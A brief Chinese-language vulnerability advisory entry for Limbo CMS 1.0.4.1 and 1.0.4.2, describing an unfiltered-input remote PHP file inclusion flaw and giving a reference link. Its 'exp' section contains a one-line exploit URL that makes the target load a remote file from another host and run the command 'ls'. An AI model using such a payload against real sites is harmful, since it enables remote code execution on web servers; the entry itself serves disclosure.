## 漏洞类型:
输入验证错误
## 影响版本:
Limbo CMS Limbo CMS 1.0.4 .2
Limbo CMS Limbo CMS 1.0.4 .1
## 漏洞成因:
没有过滤用户输入,导致攻击者可以执行远程php文件,从而威胁网站甚至
是服务器
## exp:
```
http://www.example.com/classes/adodbt/sql.php?classes_dir=http://www.example2.com/cmd.gif?cmd=ls
```
## 参考:
http://www.securityfocus.com/bid/17760/info
暂无评论